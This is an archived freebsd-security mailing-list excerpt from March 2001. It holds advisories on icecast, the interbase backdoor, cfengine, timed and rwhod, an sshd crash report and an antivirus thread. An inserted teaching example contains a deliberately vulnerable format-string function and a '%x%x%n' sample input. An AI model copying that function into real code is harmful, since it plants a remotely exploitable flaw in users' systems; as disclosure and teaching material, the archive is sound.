Cc: Alex Popa <razor@ldc.ro>, security@FreeBSD.ORG
Subject: Re: 4.3-BETA, sshd.core found in root directory.
Message-ID: <20010312152215.A94640@mollari.cthul.hu>
References: <20010313004813.A78221@ldc.ro> <20010312145754.A489@Odin.AC.HMC.Edu>
Mime-Version: 1.0
Content-Type: multipart/signed; micalg=pgp-md5;
	protocol="application/pgp-signature"; boundary="Nq2Wo0NMKNjxTN9z"
Content-Disposition: inline
User-Agent: Mutt/1.2.5i
In-Reply-To: <20010312145754.A489@Odin.AC.HMC.Edu>; from brooks@one-eyed-alien.net on Mon, Mar 12, 2001 at 02:57:54PM -0800
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org


--Nq2Wo0NMKNjxTN9z
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
Content-Transfer-Encoding: quoted-printable

On Mon, Mar 12, 2001 at 02:57:54PM -0800, Brooks Davis wrote:
> On Tue, Mar 13, 2001 at 12:48:13AM +0200, Alex Popa wrote:
> > I am not really sure what this means (could mean a lot of things,
> > including bad memory on my machine), but here are the facts:
>
> This reminds me of something I noticed during the last discussion of
> ssh I got involved in and completely forgot about.  If you create an
> account with a bad shell (say, /bin/false) and run the following command
> you get an immediate sshd core dump:
>
> ssh -t xxx@localhost /bin/sh
>
> Attempting to run gdb on the core appears to show that I'm in:
>
> #0  0x4817c3b7 in login_getpwclass () from /usr/lib/libutil.so.3
>
> but the binary is stripped so I don't know and my /usr/obj is out of
> sync with my world at the moment so I figure running gdb against the
> unstripped binary is not productive.

There's a PR open about this and Brian is looking into it -
indications are it's a simple bug and not a security problem, denial
of service or otherwise.

Kris




--Nq2Wo0NMKNjxTN9z--



From owner-freebsd-security  Mon Mar 12 15:31:48 2001
Delivered-To: freebsd-security@freebsd.org
Received: from freefall.freebsd.org (freefall.freebsd.org [216.136.204.21])
	by hub.freebsd.org (Postfix) with ESMTP
	id A965B37B71A; Mon, 12 Mar 2001 15:31:37 -0800 (PST)
	(envelope-from security-advisories@FreeBSD.org)
Received: (from kris@localhost)
	by freefall.freebsd.org (8.11.1/8.11.1) id f2CNVb526130;
	Mon, 12 Mar 2001 15:31:37 -0800 (PST)
	(envelope-from security-advisories@FreeBSD.org)
Date: Mon, 12 Mar 2001 15:31:37 -0800 (PST)
Message-Id: <200103122331.f2CNVb526130@freefall.freebsd.org>
X-Authentication-Warning: freefall.freebsd.org: kris set sender to security-advisories@FreeBSD.org using -f
From: FreeBSD Security Advisories <security-advisories@FreeBSD.org>
To: FreeBSD Security Advisories <security-advisories@FreeBSD.org>
Subject: FreeBSD Ports Security Advisory FreeBSD-SA-01:23.icecast
Reply-To: security-advisories@FreeBSD.org
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

-----BEGIN PGP SIGNED MESSAGE-----

=============================================================================
FreeBSD-SA-01:23                                           Security Advisory
                                                                FreeBSD, Inc.

Topic:          icecast port contains remote vulnerability

Category:       ports
Module:         icecast
Announced:      2001-03-12
Credits:        |CyRaX| <cyrax@pkcrew.org>
Affects:        Ports collection prior to the correction date.
Corrected:      2001-03-10
Vendor status:  Unresponsive
FreeBSD only:   NO

I.   Background

icecast is a server for streaming MP3 audio.

II.  Problem Description

The icecast software, versions prior to 1.3.7_1, contains multiple
format string vulnerabilities, which allow a remote attacker to
execute arbitrary code as the user running icecast, usually the root
user.

There are a number of other potential abuses of format strings which
may or may not pose security risks, but have not currently been
audited.

The icecast port is not installed by default, nor is it "part of
FreeBSD" as such: it is part of the FreeBSD ports collection, which
contains nearly 4700 third-party applications in a ready-to-install
format.  The ports collections shipped with FreeBSD 3.5.1 and 4.2
contain this problem since it was discovered after the releases.

FreeBSD makes no claim about the security of these third-party
applications, although an effort is underway to provide a security
audit of the most security-critical ports.

III. Impact

Arbitrary remote users can execute arbitrary code on the local system
as the user running icecast, usually the root user.

If you have not chosen to install the icecast port/package, then your
system is not vulnerable to this problem.

IV.  Workaround

Deinstall the icecast port/package, if you have installed it.

V.   Solution

Consider running the icecast software as a non-privileged user to
minimize the impact of further security vulnerabilities in this
software.

To upgrade icecast, choose one of the following options:

1) Upgrade your entire ports collection and rebuild the icecast port.

2) Deinstall the old package and install a new package dated after the
correction date, obtained from:

[i386]
ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-4-stable/audio/icecast-1.3.7_1.tgz
ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-5-current/audio/icecast-1.3.7_1.tgz

NOTE: It may be several days before updated packages are available

[alpha]
ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/alpha/packages-4-stable/audio/icecast-1.3.7_1.tgz
ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/alpha/packages-5-current/audio/icecast-1.3.7_1.tgz

3) download a new port skeleton for the icecast port from:

http://www.freebsd.org/ports/

and use it to rebuild the port.

4) Use the portcheckout utility to automate option (3) above. The
portcheckout port is available in /usr/ports/devel/portcheckout or the
package can be obtained from:

ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-4-stable/devel/portcheckout-2.0.tgz
ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/alpha/packages-4-stable/devel/portcheckout-2.0.tgz
ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-5-current/devel/portcheckout-2.0.tgz
ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/alpha/packages-5-current/devel/portcheckout-2.0.tgz



From owner-freebsd-security  Mon Mar 12 15:35:11 2001
Delivered-To: freebsd-security@freebsd.org
Received: from freefall.freebsd.org (freefall.freebsd.org [216.136.204.21])
	by hub.freebsd.org (Postfix) with ESMTP
	id A503837B718; Mon, 12 Mar 2001 15:34:53 -0800 (PST)
	(envelope-from security-advisories@FreeBSD.org)
Received: (from kris@localhost)
	by freefall.freebsd.org (8.11.1/8.11.1) id f2CNYrJ26352;
	Mon, 12 Mar 2001 15:34:53 -0800 (PST)
	(envelope-from security-advisories@FreeBSD.org)
Date: Mon, 12 Mar 2001 15:34:53 -0800 (PST)
Message-Id: <200103122334.f2CNYrJ26352@freefall.freebsd.org>
X-Authentication-Warning: freefall.freebsd.org: kris set sender to security-advisories@FreeBSD.org using -f
From: FreeBSD Security Advisories <security-advisories@FreeBSD.org>
To: FreeBSD Security Advisories <security-advisories@FreeBSD.org>
Subject: FreeBSD Ports Security Advisory FreeBSD-SA-01:26.interbase
Reply-To: security-advisories@FreeBSD.org
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

-----BEGIN PGP SIGNED MESSAGE-----

=============================================================================
FreeBSD-SA-01:26                                           Security Advisory
                                                                FreeBSD, Inc.

Topic:          interbase contains remote backdoor

Category:       ports
Module:         interbase
Announced:      2001-03-12
Credits:        Firebird project <http://firebird.sourceforge.net>
Affects:        Ports collection prior to the correction date.
Corrected:      See below.
Vendor status:  No update released
FreeBSD only:   NO

I.   Background

Interbase is a SQL database server from Borland.

II.  Problem Description

The interbase software contains a remote backdoor account, which was
apparently introduced by the vendor in 1992.  The interbase source
code has recently been released and is the basis for a derivative
project called firebird, who are credited with discovering the
vulnerability.

The backdoor account has full read and write access to databases
stored on the server, and also gives the ability to write to arbitrary
files on the server as the user running the interbase server (usually
user root).  Remote attackers may connect to the database on TCP port
3050.

The interbase port is not installed by default, nor is it "part of
FreeBSD" as such: it is part of the FreeBSD ports collection, which
contains nearly 4700 third-party applications in a ready-to-install
format.  The ports collections shipped with FreeBSD 3.5.1 and 4.2
contain this problem since it was discovered after the releases.

FreeBSD makes no claim about the security of these third-party
applications, although an effort is underway to provide a security
audit of the most security-critical ports.

III. Impact

Remote users who can connect to the interbase database server can
obtain full access to all databases using a backdoor account built
into the server itself.  This account cannot be disabled.

If you have not chosen to install the interbase port/package, then
your system is not vulnerable to this problem.

IV.  Workaround

1) Deinstall the interbase port/package, if you have installed it.

2) Use packet filters on your perimeter firewalls, or ipfw(8)/ipf(8)
on the interbase server to prevent connections from untrusted systems
to TCP port 3050 on the interbase server.  Note that local users, or
arbitrary users on systems permitted to connect to the TCP port can
still access the backdoor account.

3) Migrate to the firebird database, which is an open-source
derivative of the interbase software which does not contain the
backdoor account.
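Added example, not from the advisory: rc.firewall-style ipfw(8) rules implementing workaround 2, letting only listed client networks open connections to TCP port 3050 on the interbase server and logging every other attempt. The addresses are placeholders, the rule numbers are assumed to be free in your ruleset, and setting fwcmd=echo prints the rules instead of installing them.

```shell
#!/bin/sh
# Added example, not from the advisory: restrict TCP 3050 on the interbase
# server to trusted client networks with ipfw(8), in the style of rc.firewall.
# Set fwcmd=echo to print the rules instead of installing them.
fwcmd="${fwcmd:-/sbin/ipfw}"

# interbase_rules <server-addr> <trusted-net>...   (rule numbers 3050+ assumed free)
interbase_rules() {
    server="$1"; shift
    n=3050
    # packets of already open connections pass; new connections are decided below
    ${fwcmd} add $n allow tcp from any to "$server" 3050 established
    for net in "$@"; do
        n=$((n + 1))
        ${fwcmd} add $n allow tcp from "$net" to "$server" 3050 setup
    done
    # every other packet to the interbase port is dropped and logged (needs
    # net.inet.ip.fw.verbose=1), so probes for the backdoor show in the firewall log
    n=$((n + 1))
    ${fwcmd} add $n deny log tcp from any to "$server" 3050
    # hosts inside the trusted networks, and local users, can still use the
    # backdoor account: this narrows exposure, it does not remove it (advisory IV)
}

# example invocation with placeholder addresses; preview with
#   fwcmd=echo sh interbase-fw.sh 192.0.2.10 192.0.2.0/24
if [ $# -ge 2 ]; then
    interbase_rules "$@"
fi
```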

V.   Solution

The FreeBSD port of interbase is not provided by Borland -- it is
provided in binary form from Rios Corporation -- and there does not
appear to be a patch available for the security vulnerability.
Therefore there is currently no complete solution to this security
vulnerability; see the previous section for possible workarounds.



From owner-freebsd-security  Mon Mar 12 15:38: 8 2001
Delivered-To: freebsd-security@freebsd.org
Received: from freefall.freebsd.org (freefall.freebsd.org [216.136.204.21])
	by hub.freebsd.org (Postfix) with ESMTP
	id A92F337B71A; Mon, 12 Mar 2001 15:37:52 -0800 (PST)
	(envelope-from security-advisories@FreeBSD.org)
Received: (from kris@localhost)
	by freefall.freebsd.org (8.11.1/8.11.1) id f2CNbqc26863;
	Mon, 12 Mar 2001 15:37:52 -0800 (PST)
	(envelope-from security-advisories@FreeBSD.org)
Date: Mon, 12 Mar 2001 15:37:52 -0800 (PST)
Message-Id: <200103122337.f2CNbqc26863@freefall.freebsd.org>
X-Authentication-Warning: freefall.freebsd.org: kris set sender to security-advisories@FreeBSD.org using -f
From: FreeBSD Security Advisories <security-advisories@FreeBSD.org>
To: FreeBSD Security Advisories <security-advisories@FreeBSD.org>
Subject: FreeBSD Ports Security Advisory FreeBSD-SA-01:27.cfengine
Reply-To: security-advisories@FreeBSD.org
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

-----BEGIN PGP SIGNED MESSAGE-----

=============================================================================
FreeBSD-SA-01:27                                           Security Advisory
                                                                FreeBSD, Inc.

Topic:          cfengine port contains remote root vulnerability

Category:       ports
Module:         cfengine
Announced:      2001-03-12
Credits:        Pekka Savola <pekkas@NETCORE.FI>
Affects:        Ports collection prior to the correction date.
Corrected:      2001-01-21
Vendor status:  Updated version released
FreeBSD only:   NO

I.   Background

cfengine is a system for automating the configuration and maintenance
of large networks.

II.  Problem Description

The cfengine port, versions prior to 1.6.1, contained several format
string vulnerabilities which allow a remote attacker to execute
arbitrary code on the local system as the user running cfengine,
usually user root.

The cfengine port is not installed by default, nor is it "part of
FreeBSD" as such: it is part of the FreeBSD ports collection, which
contains nearly 4700 third-party applications in a ready-to-install
format.  The ports collections shipped with FreeBSD 3.5.1 and 4.2
contain this problem since it was discovered after the releases.

FreeBSD makes no claim about the security of these third-party
applications, although an effort is underway to provide a security
audit of the most security-critical ports.

III. Impact

Arbitrary remote users can execute code on the local system as the
user running cfengine, usually user root.

If you have not chosen to install the cfengine port/package, then your
system is not vulnerable to this problem.

IV.  Workaround

One of the following:

1) Deinstall the cfengine port/package, if you have installed it.

2) Implement access controls on connections to the cfengine server,
either at the application level using the cfengine configuration file,
or by using network-level packet filtering on the local system using
ipfw(8)/ipf(8), or on the perimeter firewalls.

V.   Solution

One of the following:

1) Upgrade your entire ports collection and rebuild the cfengine port.

2) Deinstall the old package and install a new package dated after the
correction date, obtained from:

[i386]
ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-4-stable/sysutils/cfengine-1.6.3.tar.gz
ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-5-current/sysutils/cfengine-1.6.3.tar.gz

[alpha]
Packages are not automatically generated for the alpha architecture at
this time due to lack of build resources.

3) download a new port skeleton for the cfengine port from:

http://www.freebsd.org/ports/

and use it to rebuild the port.

4) Use the portcheckout utility to automate option (3) above. The
portcheckout port is available in /usr/ports/devel/portcheckout or the
package can be obtained from:

ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-4-stable/devel/portcheckout-2.0.tgz
ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/alpha/packages-4-stable/devel/portcheckout-2.0.tgz
ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-5-current/devel/portcheckout-2.0.tgz
ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/alpha/packages-5-current/devel/portcheckout-2.0.tgz
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.4 (FreeBSD)
Comment: For info see http://www.gnupg.org

iQCVAwUBOq1dclUuHi5z0oilAQFhhAQApfRMj88GYMKiTtLeyjWeaDLFIlDjUTl4
fF1QQNzetOSIoVjA+CsbkTgsX/c8B6Lc7BuTI7K3BLKUu2QC2GbYkn5/ymCdYQeE
dW2S00bMdBP6GwURAdFnizezkZq5Y3oEVYXVL4s91M9jb3wCwNOwnbfKH/aegFvL
ZOjDvMUdjb0=
=yzjS
-----END PGP SIGNATURE-----
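The advisory above names the defect class (untrusted data reaching a printf-style format string) without showing it. The following is an added example and not cfengine's code or part of the advisory: the vulnerable pattern beside its hardened form, plus a small audit helper a reviewer can use to flag strings that are about to be passed as a format. The function names, the "cfengine:" log prefix and the sample inputs are assumptions constructed for illustration.

```c
#include <stdio.h>
#include <string.h>

/*
 * Added example (not cfengine's code): CWE-134 style format string bug
 * beside the fix.  Names and sample strings are constructed for this
 * illustration.
 */

#define LOG_MAX 128

/* VULNERABLE: the caller-supplied string becomes the format argument, so
 * any '%' directive in it is interpreted by the format parser.  Behaviour
 * is undefined once a directive is present; it is only ever called with a
 * directive-free string below, which is exactly why this bug hides in
 * testing. */
static int format_log_unsafe(char *out, size_t outlen, const char *untrusted)
{
    return snprintf(out, outlen, untrusted);
}

/* HARDENED: a fixed format string; the untrusted data is only an argument,
 * so '%x' or '%n' inside it are copied as plain text. */
static int format_log_safe(char *out, size_t outlen, const char *untrusted)
{
    return snprintf(out, outlen, "cfengine: %s", untrusted);
}

/* Audit helper: would this string, used as a format, carry a conversion
 * directive?  "%%" is the escaped percent sign and is not a directive. */
static int contains_format_directive(const char *s)
{
    for (; *s != '\0'; s++) {
        if (*s == '%') {
            if (s[1] == '%') {   /* literal percent, skip both characters */
                s++;
                continue;
            }
            return 1;
        }
    }
    return 0;
}

int main(void)
{
    char buf[LOG_MAX];
    const char *hostile = "host %x%x%n";   /* constructed sample input */

    format_log_safe(buf, sizeof buf, hostile);
    printf("safe path:   \"%s\"\n", buf);   /* directives survive as text */

    if (contains_format_directive(hostile))
        printf("unsafe path: input carries a format directive, refusing\n");

    format_log_unsafe(buf, sizeof buf, "host up");
    printf("unsafe path with benign input: \"%s\"\n", buf);
    return 0;
}
```

Compilers will also flag the unsafe pattern at build time: gcc and clang warn on a non-literal format with no arguments when `-Wformat -Wformat-security` is enabled, which is a cheap check to add to a port's build.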



From owner-freebsd-security  Mon Mar 12 15:44:14 2001
Delivered-To: freebsd-security@freebsd.org
Received: from freefall.freebsd.org (freefall.freebsd.org [216.136.204.21])
	by hub.freebsd.org (Postfix) with ESMTP
	id DE4F637B719; Mon, 12 Mar 2001 15:44:00 -0800 (PST)
	(envelope-from security-advisories@FreeBSD.org)
Received: (from kris@localhost)
	by freefall.freebsd.org (8.11.1/8.11.1) id f2CNi0R27619;
	Mon, 12 Mar 2001 15:44:00 -0800 (PST)
	(envelope-from security-advisories@FreeBSD.org)
Date: Mon, 12 Mar 2001 15:44:00 -0800 (PST)
Message-Id: <200103122344.f2CNi0R27619@freefall.freebsd.org>
X-Authentication-Warning: freefall.freebsd.org: kris set sender to security-advisories@FreeBSD.org using -f
From: FreeBSD Security Advisories <security-advisories@FreeBSD.org>
To: FreeBSD Security Advisories <security-advisories@FreeBSD.org>
Subject: FreeBSD Security Advisory FreeBSD-SA-01:28.timed
Reply-To: security-advisories@FreeBSD.org
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

-----BEGIN PGP SIGNED MESSAGE-----

=============================================================================
FreeBSD-SA-01:28                                           Security Advisory
                                                                FreeBSD, Inc.

Topic:          timed allows remote denial of service

Category:       core
Module:         timed
Announced:      2001-03-12
Credits:        Discovered during internal source code auditing
Affects:        All released versions of FreeBSD 3.x, 4.x.
                FreeBSD 3.5-STABLE prior to the correction date.
                FreeBSD 4.2-STABLE prior to the correction date.
Corrected:      2001-03-10 (FreeBSD 3.5-STABLE)
                2001-01-07 (FreeBSD 4.2-STABLE)
FreeBSD only:   NO

I.   Background

timed(8) is a server for the Time Synchronisation Protocol, for
synchronising the system clocks of multiple clients.

II.  Problem Description

Malformed packets sent to the timed daemon could cause it to crash,
thereby denying service to clients if timed is not run under a
watchdog process which causes it to automatically restart in the event
of a failure.  The timed daemon is not run in this way in the default
invocation from /etc/rc.conf using the timed_enable variable.

The timed daemon is not enabled by default, and its use is not
recommended (FreeBSD includes ntpd(8), the network time protocol
daemon, which provides superior functionality).

All versions of FreeBSD 3.x and 4.x prior to the correction date
including 3.5.1-RELEASE and 4.2-RELEASE are vulnerable to this
problem, if they have been configured to run timed.  It was corrected
prior to the forthcoming release of FreeBSD 4.3.

III. Impact

Remote users can cause the timed daemon to crash, denying service to
clients.

IV.  Workaround

Implement packet filtering at perimeter firewalls or on the local
machine using ipfw(8)/ipf(8) to prevent untrusted users from
connecting to the timed service.  The timed daemon listens on UDP port
525 by default.

V.   Solution

Upgrade your vulnerable FreeBSD system to 3.5-STABLE or 4.2-STABLE
after the respective correction dates.

To patch your present system: download the relevant patch from the
below location, and execute the following commands as root:

# fetch ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/patches/SA-01:28/timed.patch
# fetch ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/patches/SA-01:28/timed.patch.asc

This patch has been verified to apply to FreeBSD 4.2-RELEASE and
FreeBSD 3.5.1-RELEASE.  It may or may not apply to older releases.

Verify the detached PGP signature using your PGP utility.

# cd /usr/src/usr.sbin/timed/timed
# patch -p < /path/to/patch
# make depend && make all install

Kill and restart timed to cause the changes to take effect.  If you
have started timed with non-standard options (e.g. by setting
timed_flags in /etc/rc.conf) then the below command will need to be
modified appropriately.

# killall -KILL timed
# /usr/sbin/timed


-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.4 (FreeBSD)
Comment: For info see http://www.gnupg.org

iQCVAwUBOq1emVUuHi5z0oilAQEYEwP/cPNMQO7LjlEs2/MyxJwVKpQLRzmprJjQ
i2QpXEvkZgXSxAcIh15jNsR1TPwUnzCRWHZ5touw0DxTbTbMsnzRVx0/P5jGmQCT
6n5Z11puyEg336zET+tGhVnEt9Ybm7Z/h7Et+njVRTVqbe2AtpFeSbI5NXlZCgs6
ZUYxdLUhfPM=
=Dw88
-----END PGP SIGNATURE-----



From owner-freebsd-security  Mon Mar 12 15:48:13 2001
Delivered-To: freebsd-security@freebsd.org
Received: from freefall.freebsd.org (freefall.freebsd.org [216.136.204.21])
	by hub.freebsd.org (Postfix) with ESMTP
	id 2EFDA37B718; Mon, 12 Mar 2001 15:47:59 -0800 (PST)
	(envelope-from security-advisories@FreeBSD.org)
Received: (from kris@localhost)
	by freefall.freebsd.org (8.11.1/8.11.1) id f2CNlxe28107;
	Mon, 12 Mar 2001 15:47:59 -0800 (PST)
	(envelope-from security-advisories@FreeBSD.org)
Date: Mon, 12 Mar 2001 15:47:59 -0800 (PST)
Message-Id: <200103122347.f2CNlxe28107@freefall.freebsd.org>
X-Authentication-Warning: freefall.freebsd.org: kris set sender to security-advisories@FreeBSD.org using -f
From: FreeBSD Security Advisories <security-advisories@FreeBSD.org>
To: FreeBSD Security Advisories <security-advisories@FreeBSD.org>
Subject: FreeBSD Security Advisory FreeBSD-SA-01:29.rwhod
Reply-To: security-advisories@FreeBSD.org
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

-----BEGIN PGP SIGNED MESSAGE-----

=============================================================================
FreeBSD-SA-01:29                                           Security Advisory
                                                                FreeBSD, Inc.

Topic:          rwhod allows remote denial of service

Category:       core
Module:         rwhod
Announced:      2001-03-12
Credits:        Mark Huizer <xaa@xaa.iae.nl>
Affects:        All released versions of FreeBSD 3.x, 4.x.
                FreeBSD 3.5-STABLE prior to the correction date.
                FreeBSD 4.2-STABLE prior to the correction date.
Corrected:      2000-12-23 (FreeBSD 3.5-STABLE)
                2000-12-22 (FreeBSD 4.2-STABLE)
FreeBSD only:   NO

I.   Background

rwhod(8) is a server which implements the rwho protocol, which
communicates information on system uptime and logged-in users between
machines on a network.

II.  Problem Description

Malformed packets sent to the rwhod daemon could cause it to crash,
thereby denying service to clients if rwhod is not run under a
watchdog process which causes it to automatically restart in the event
of a failure.  The rwhod daemon is not run in this way in the default
invocation from /etc/rc.conf using the rwhod_enable variable.

All versions of FreeBSD 3.x and 4.x prior to the correction date
including 3.5.1-RELEASE and 4.2-RELEASE are vulnerable to this
problem, if they have been configured to run rwhod (this is not enabled
by default).

III. Impact

Remote users can cause the rwhod daemon to crash, denying service to
clients.

IV.  Workaround

Implement packet filtering at perimeter firewalls or on the local
machine using ipfw(8)/ipf(8) to prevent untrusted users from
connecting to the rwhod service.  The rwhod daemon listens on UDP port
513 by default.

V.   Solution

Upgrade your vulnerable FreeBSD system to 3.5-STABLE or 4.2-STABLE
after the respective correction dates.

To patch your present system: download the relevant patch from the
below location, and execute the following commands as root:

# fetch ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/patches/SA-01:29/rwhod.patch
# fetch ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/patches/SA-01:29/rwhod.patch.asc

This patch has been verified to apply to FreeBSD 4.2-RELEASE and
FreeBSD 3.5.1-RELEASE.  It may or may not apply to older releases.

Verify the detached PGP signature using your PGP utility.

# cd /usr/src/usr.sbin/rwhod
# patch -p < /path/to/patch
# make depend && make all install

Kill and restart rwhod to cause the changes to take effect.  If you
have started rwhod with non-standard options (e.g. by setting
rwhod_flags in /etc/rc.conf) then the below command will need to be
modified appropriately.

# killall -KILL rwhod
# /usr/sbin/rwhod

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.4 (FreeBSD)
Comment: For info see http://www.gnupg.org

iQCVAwUBOq1fmlUuHi5z0oilAQG05QP/bQpUXpXc+X3/k/jbqgxjNOXwfzYRwNph
trCjRBKDKZrBGvlS2mTSbyisn6Rcv5PhigVAmU7sllrrXmYDCuMjNoMQqIhRwMax
ojaklsg6F8rX3zNwUlaQp45ZYiJ9Zi34kkRRnZQ5oAFciS6I/3tYnP9t0Sedbbsi
V/na+hI/Gtk=
=TskQ
-----END PGP SIGNATURE-----



From owner-freebsd-security  Mon Mar 12 19: 5:18 2001
Delivered-To: freebsd-security@freebsd.org
Received: from bsdie.rwsystems.net (bsdie.rwsystems.net [209.197.223.2])
	by hub.freebsd.org (Postfix) with ESMTP id 2096837B71A
	for <freebsd-security@freebsd.org>; Mon, 12 Mar 2001 19:05:14 -0800 (PST)
	(envelope-from jwyatt@rwsystems.net)
Received: from bsdie.rwsystems.net([209.197.223.2]) (1999 bytes) by bsdie.rwsystems.net
	via sendmail with P:esmtp/R:bind_hosts/T:inet_zone_bind_smtp
	(sender: <jwyatt@rwsystems.net>) 
	id <m14cf6R-000CCSC@bsdie.rwsystems.net>
	for <freebsd-security@freebsd.org>; Mon, 12 Mar 2001 21:04:03 -0600 (CST)
	(Smail-3.2.0.111 2000-Feb-17 #1 built 2000-Jun-25)
Date: Mon, 12 Mar 2001 21:04:02 -0600 (CST)
From: James Wyatt <jwyatt@rwsystems.net>
To: Will Mitayai Keeso Rowe <mit@mitayai.net>
Cc: freebsd-security@freebsd.org
Subject: Re: Virus Scanning Software for FreeBSD
In-Reply-To: <NEBBIEGPMLMKDBMMICFNCEPPELAA.mit@mitayai.net>
Message-ID: <Pine.BSF.4.10.10103122000480.72725-100000@bsdie.rwsystems.net>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; CHARSET=US-ASCII
Content-ID: <Pine.BSF.4.10.10103122000482.72725@bsdie.rwsystems.net>
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

I have an eval copy of a product that looks promising: Sophos antivirus.

	http://www.sophos.com/products/antivirus/savunix.html

You can use the SAVI (API for virus checking) to scan email according to
the description at:

	http://www.sophos.com/products/antivirus/savi/

Their licensing looks fair and the sales person assigned to me has been
politely helpful and not overly insistent. Everything I've looked at so
far looks great, but the customer that wanted it has had delays and now
wants to wait for FreeBSD 4.3-RELEASE to install things on their server.

Updates are monthly CDs and urgent updates are available as downloads.

Our intent is to have it go after SMTP, HTTP, and FTP if we can and to
scan the Samba partitions for file infections. It handles uSoft Office
products like Word(tm) docs and such.

Best of all, they support FreeBSD so we should support them, right? - Jy@

On Mon, 12 Mar 2001, Will Mitayai Keeso Rowe wrote:
> Is anyone aware of any virus scanning solutions for freebsd, particularly
> solutions for email? I don't trust my users not to follow proper email
> guidelines, and thus would like to stop email at the server before they get
> delivered the message.
> 
> Regards,
> Mit
> 
> --
> Will Mitayai Keeso Rowe
> 
> For full contact information, please visit:
> http://my.infotriever.com/mitayai




From owner-freebsd-security  Mon Mar 12 20:34:44 2001
Delivered-To: freebsd-security@freebsd.org
Received: from w2xo.pgh.pa.us (18.gibs5.xdsl.nauticom.net [209.195.184.19])
	by hub.freebsd.org (Postfix) with ESMTP id 0B67A37B71C
	for <freebsd-security@FreeBSD.ORG>; Mon, 12 Mar 2001 20:34:36 -0800 (PST)
	(envelope-from durham@w2xo.pgh.pa.us)
Received: from shazam (shazam [192.168.5.3])
	by w2xo.pgh.pa.us (8.11.2/8.9.3) with ESMTP id f2D4XOq36759;
	Tue, 13 Mar 2001 04:33:24 GMT
	(envelope-from durham@w2xo.pgh.pa.us)
Date: Mon, 12 Mar 2001 23:35:38 -0500 (EST)
From: Jim Durham <durham@w2xo.pgh.pa.us>
X-Sender: durham@shazam.int
To: James Wyatt <jwyatt@rwsystems.net>
Cc: Will Mitayai Keeso Rowe <mit@mitayai.net>,
	freebsd-security@FreeBSD.ORG
Subject: Re: Virus Scanning Software for FreeBSD
In-Reply-To: <Pine.BSF.4.10.10103122000480.72725-100000@bsdie.rwsystems.net>
Message-ID: <Pine.BSF.4.21.0103122322250.25997-100000@shazam.int>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Mon, 12 Mar 2001, James Wyatt wrote:

> I have an eval copy of a product that looks promising: Sophos antivirus.
> 
> 	http://www.sophos.com/products/antivirus/savunix.html
> 
> You can use the SAVI (API for virus checking) to scan email according to
> the description at:
> 
> 	http://www.sophos.com/products/antivirus/savi/
> 
> Their licensing looks fair and the sales person assigned to me has been
> politely helpful and not overly insistent. Everything I've looked at so
> far looks great, but the customer that wanted it has had delays and now
> wants to wait for FreeBSD 4.3-RELEASE to install things on their server.
> 
> Updates are monthly CDs and urgent updates are available as downloads.
> 
> Our intent is to have it go after SMTP, HTTP, and FTP if we can and to
> scan the Samba partitions for file infections. It handles uSoft Office
> products like Word(tm) docs and such.
> 
> Best of all, they support FreeBSD so we should support them, right? - Jy@
> 
> On Mon, 12 Mar 2001, Will Mitayai Keeso Rowe wrote:
> > Is anyone aware of any virus scanning solutions for freebsd, particularly
> > solutions for email? I don't trust my users not to follow proper email
> > guidelines, and thus would like to stop email at the server before they get
> > delivered the message.
> > 

I am using Sophos, and Amavis at our company. It is working very well.
Sophos supports Windoze, Mac, Linux, FreeBSD, even VMS and OS2!
You have Sendmail call Amavis for all incoming mail. Amavis unpacks
and scans all attachments, even zipped and rar'ed and so forth, then
delivers the mail to the user's mailbox if it's OK. Otherwise, it
mails either the originator of the virus mail and/or the administrator
and saves the virus mail for perusal. Works very well, but you need
a little horsepower on the server. Our company sends around huge
Autocad drawings and Excel spreadsheets and they all have to be
"unattached" and scanned.

I'm also using the Sophos Intercheck daemon. You put the Sophos CD
in any workstation on your LAN, pick a directory on the server in
which to install the Sophos setup stuff and Intercheck stuff. Then
you install all the workstations (including the one you used to generate
the server setup directory) from the server (running SAMBA of course!).

Now, when a user logs into the M$ domain on Samba, any updates will
be automatically downloaded to the workstation. I update several times
daily from the Sophos site. When Sophos is first run on the workstation,
it builds a file list. Any time the list is modified, it refers it
to the intercheck daemon on the server for virus sweeping. Of course,
any e-mail attachment that was unpacked would be scanned immediately,
as it wouldn't be on the "safe" list.

Works well..

Jim Durham





From owner-freebsd-security  Mon Mar 12 21: 5:36 2001
Delivered-To: freebsd-security@freebsd.org
Received: from smtp011.mail.yahoo.com (smtp011.mail.yahoo.com [216.136.173.31])
	by hub.freebsd.org (Postfix) with SMTP id 2BCF337B719
